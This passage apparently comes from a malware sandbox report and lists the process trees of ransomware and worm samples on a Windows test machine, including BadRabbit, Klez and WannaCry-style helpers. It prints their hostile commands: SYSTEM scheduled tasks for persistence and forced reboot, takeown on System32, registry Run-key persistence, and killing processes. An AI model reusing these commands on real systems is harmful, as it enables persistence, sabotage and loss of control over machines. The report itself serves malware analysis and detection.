  - Suspicious use of SetWindowsHookEx
  PID:1676
- C:\Users\Admin\Desktop\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:1140
- C:\Users\Admin\Desktop\taskse.exe
  taskse.exe C:\Users\Admin\Desktop\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:684
- C:\Users\Admin\Desktop\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:3408
- C:\Users\Admin\Desktop\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:1560
- C:\Users\Admin\Desktop\taskse.exe
  taskse.exe C:\Users\Admin\Desktop\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:424
- C:\Users\Admin\Desktop\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:796
- C:\Users\Admin\Desktop\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:4700
- C:\Users\Admin\Desktop\taskse.exe
  taskse.exe C:\Users\Admin\Desktop\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:1180
- C:\Users\Admin\Desktop\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:752
- C:\Users\Admin\Desktop\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:1652
- C:\Users\Admin\Desktop\taskse.exe
  taskse.exe C:\Users\Admin\Desktop\@[email protected]
  2⤵
  PID:3040
- C:\Users\Admin\Desktop\@[email protected]
  @[email protected]
  2⤵
  - Suspicious use of SetWindowsHookEx
  PID:2632
- C:\Users\Admin\Desktop\taskdl.exe
  taskdl.exe
  2⤵
  PID:2564
- C:\Users\Admin\Desktop\taskse.exe
  taskse.exe C:\Users\Admin\Desktop\@[email protected]
  2⤵
  PID:8104
- C:\Users\Admin\Desktop\@[email protected]
  @[email protected]
  2⤵
  - Suspicious use of SetWindowsHookEx
  PID:8112
- C:\Users\Admin\Desktop\taskdl.exe
  taskdl.exe
  2⤵
  PID:7320
- C:\Users\Admin\Desktop\taskse.exe
  taskse.exe C:\Users\Admin\Desktop\@[email protected]
  2⤵
  PID:10244
- C:\Users\Admin\Desktop\@[email protected]
  @[email protected]
  2⤵
  PID:10256
- C:\Users\Admin\Desktop\taskdl.exe
  taskdl.exe
  2⤵
  PID:10504
- C:\Users\Admin\Desktop\taskse.exe
  taskse.exe C:\Users\Admin\Desktop\@[email protected]
  2⤵
  PID:12268
- C:\Users\Admin\Desktop\@[email protected]
  @[email protected]
  2⤵
  PID:8508
- C:\Users\Admin\Desktop\taskdl.exe
  taskdl.exe
  2⤵
  PID:7068
- C:\Users\Admin\Desktop\taskse.exe
  taskse.exe C:\Users\Admin\Desktop\@[email protected]
  2⤵
  PID:11932
- C:\Users\Admin\Desktop\@[email protected]
  @[email protected]
  2⤵
  PID:10052
- C:\Users\Admin\Desktop\taskdl.exe
  taskdl.exe
  2⤵
  PID:13996
- C:\Users\Admin\Desktop\taskse.exe
  taskse.exe C:\Users\Admin\Desktop\@[email protected]
  2⤵
  PID:6368
- C:\Users\Admin\Desktop\@[email protected]
  @[email protected]
  2⤵
  PID:7724
- C:\Users\Admin\Desktop\taskdl.exe
  taskdl.exe
  2⤵
  PID:5592
- C:\Users\Admin\Desktop\taskse.exe
  taskse.exe C:\Users\Admin\Desktop\@[email protected]
  2⤵
  PID:3196
- C:\Users\Admin\Desktop\@[email protected]
  @[email protected]
  2⤵
  PID:15824
- C:\Users\Admin\Desktop\taskdl.exe
  taskdl.exe
  2⤵
  PID:13536
- C:\Users\Admin\Desktop\taskse.exe
  taskse.exe C:\Users\Admin\Desktop\@[email protected]
  2⤵
  PID:16496
- C:\Users\Admin\Desktop\@[email protected]
  @[email protected]
  2⤵
  PID:16512
- C:\Users\Admin\Desktop\taskdl.exe
  taskdl.exe
  2⤵
  PID:16664

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2908

C:\Users\Admin\Desktop\BcatCrypto.exe
"C:\Users\Admin\Desktop\BcatCrypto.exe"
1⤵
PID:3232
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe"
  2⤵
  - Executes dropped EXE
  PID:2880
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c pause
    3⤵
    PID:3760

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2704
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa2d9d3cb8,0x7ffa2d9d3cc8,0x7ffa2d9d3cd8
  2⤵
  PID:1440
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1852,1348841936387360948,11104694718088347371,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1868 /prefetch:2
  2⤵
  PID:3524
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1852,1348841936387360948,11104694718088347371,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2612
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1852,1348841936387360948,11104694718088347371,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2728 /prefetch:8
  2⤵
  PID:4940
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,1348841936387360948,11104694718088347371,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3460 /prefetch:1
  2⤵
  PID:3696
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,1348841936387360948,11104694718088347371,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3480 /prefetch:1
  2⤵
  PID:3164
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,1348841936387360948,11104694718088347371,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3028 /prefetch:1
  2⤵
  PID:8
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,1348841936387360948,11104694718088347371,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:1
  2⤵
  PID:1512
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1852,1348841936387360948,11104694718088347371,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5392 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3176
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,1348841936387360948,11104694718088347371,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5072 /prefetch:1
  2⤵
  PID:2496
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1852,1348841936387360948,11104694718088347371,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4992 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3648
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1852,1348841936387360948,11104694718088347371,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4916 /prefetch:8
  2⤵
  PID:1080
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1852,1348841936387360948,11104694718088347371,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5076 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:3760
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,1348841936387360948,11104694718088347371,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2980 /prefetch:1
  2⤵
  PID:2156
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,1348841936387360948,11104694718088347371,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5420 /prefetch:1
  2⤵
  PID:4880
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,1348841936387360948,11104694718088347371,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4272 /prefetch:1
  2⤵
  PID:1540
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,1348841936387360948,11104694718088347371,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3684 /prefetch:1
  2⤵
  PID:332
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,1348841936387360948,11104694718088347371,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
  2⤵
  PID:2444
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,1348841936387360948,11104694718088347371,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
  2⤵
  PID:2956
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1852,1348841936387360948,11104694718088347371,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5984 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2880
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,1348841936387360948,11104694718088347371,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4172 /prefetch:1
  2⤵
  PID:868
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1852,1348841936387360948,11104694718088347371,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6528 /prefetch:8
  2⤵
  PID:2916
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,1348841936387360948,11104694718088347371,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6204 /prefetch:1
  2⤵
  PID:4924
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1852,1348841936387360948,11104694718088347371,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6112 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:4656
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,1348841936387360948,11104694718088347371,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6340 /prefetch:1
  2⤵
  PID:2668
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1852,1348841936387360948,11104694718088347371,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6404 /prefetch:8
  2⤵
  PID:4012
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1852,1348841936387360948,11104694718088347371,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1524 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:5064

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3468

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4724

C:\Users\Admin\Desktop\Klez.e.exe
"C:\Users\Admin\Desktop\Klez.e.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:3064

C:\Windows\SysWOW64\Winkueu.exe
C:\Windows\SysWOW64\Winkueu.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1556

C:\Users\Admin\Desktop\Klez.e.exe
"C:\Users\Admin\Desktop\Klez.e.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:3428

C:\Users\Admin\Desktop\Klez.e.exe
"C:\Users\Admin\Desktop\Klez.e.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:3120

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of SendNotifyMessage
PID:440
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa2d9d3cb8,0x7ffa2d9d3cc8,0x7ffa2d9d3cd8
  2⤵
  PID:4172
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1860,10980832815520756075,17681677437511231382,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1884 /prefetch:2
  2⤵
  PID:3212
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1860,10980832815520756075,17681677437511231382,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2300 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3572
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1860,10980832815520756075,17681677437511231382,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2724 /prefetch:8
  2⤵
  PID:4660
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,10980832815520756075,17681677437511231382,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
  2⤵
  PID:3408
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,10980832815520756075,17681677437511231382,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1
  2⤵
  PID:4332
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,10980832815520756075,17681677437511231382,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4928 /prefetch:1
  2⤵
  PID:2764
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,10980832815520756075,17681677437511231382,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4952 /prefetch:1
  2⤵
  PID:656
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1860,10980832815520756075,17681677437511231382,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3656 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2900

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3532

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4676

C:\Users\Admin\Desktop\BadRabbit.exe
"C:\Users\Admin\Desktop\BadRabbit.exe"
1⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:4396
- C:\Windows\SysWOW64\rundll32.exe
  C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
  2⤵
  - Loads dropped DLL
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  PID:2668
- - C:\Windows\SysWOW64\cmd.exe
    /c schtasks /Delete /F /TN rhaegal
    3⤵
    PID:3140
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /Delete /F /TN rhaegal
      4⤵
      PID:2860
- - C:\Windows\SysWOW64\cmd.exe
    /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 641625928 && exit"
    3⤵
    PID:3536
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 641625928 && exit"
      4⤵
      Creates scheduled task(s)
      PID:3024
- - C:\Windows\SysWOW64\cmd.exe
    /c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 23:41:00
    3⤵
    PID:4056
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 23:41:00
      4⤵
      Creates scheduled task(s)
      PID:2604
- - C:\Windows\A6F.tmp
    "C:\Windows\A6F.tmp" \\.\pipe\{249CB339-C67D-48C5-978D-AF90FB8EDC9E}
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:2508

C:\Users\Admin\Desktop\Klez.e.exe
"C:\Users\Admin\Desktop\Klez.e.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:4988

C:\Users\Admin\Desktop\ADZP 20 Complex.exe
"C:\Users\Admin\Desktop\ADZP 20 Complex.exe"
1⤵
PID:3912
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\31AE.tmp\31AF.tmp\31B0.bat "C:\Users\Admin\Desktop\ADZP 20 Complex.exe""
  2⤵
  - Drops autorun.inf file
  - Drops file in System32 directory
  - Modifies registry class
  PID:2052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K Twain_20.cmd
    3⤵
    PID:684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K Twain_20.cmd
    3⤵
    PID:3724
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Informacion.vbs"
    3⤵
    PID:3572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K Taskdl.bat
    3⤵
    PID:4960
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32" /r
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:2332
- - C:\Windows\system32\reg.exe
    reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
    3⤵
    PID:2132
- - C:\Windows\system32\reg.exe
    reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
    3⤵
    PID:968
- - C:\Windows\system32\ipconfig.exe
    ipconfig /release
    3⤵
    - Gathers network information
    PID:1016
- - C:\Windows\system32\taskkill.exe
    taskkill /im DiskPart /f
    3⤵
    - Kills process with taskkill
    PID:2840
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h *.*
    3⤵
    - Drops desktop.ini file(s)
    - Drops autorun.inf file
    - Views/modifies file attributes
    PID:3756
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
    3⤵
    PID:2608
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
    3⤵
    PID:3648
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
    3⤵
    PID:1820
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
    3⤵
    PID:4740
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
    3⤵
    PID:3700
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
    3⤵
    PID:2072
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
    3⤵
    PID:3504
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
    3⤵
    PID:4456
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
    3⤵
    PID:3500
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
    3⤵
    PID:1392
- - C:\Windows\system32\msg.exe
    msg * Virus Detectado
    3⤵
    PID:1680
- - C:\Windows\system32\msg.exe
    msg * Virus Detectado
    3⤵
